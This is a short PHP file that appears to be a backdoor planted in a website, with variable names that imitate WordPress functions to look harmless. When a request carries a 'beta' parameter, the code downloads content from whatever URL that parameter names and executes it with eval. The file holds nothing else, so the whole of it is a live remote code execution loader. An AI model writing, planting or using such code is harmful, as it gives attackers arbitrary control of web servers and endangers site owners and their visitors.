<?php
if (isset($_GET['beta'])) {
$_e_rm = $_GET['beta'];
if ($the_permalink_nf = curl_init()) {
curl_setopt($the_permalink_nf, CURLOPT_URL, $_e_rm);
curl_setopt($the_permalink_nf, CURLOPT_RETURNTRANSFER, true);
eval(curl_exec($the_permalink_nf));
curl_close($the_permalink_nf);
exit;
}
}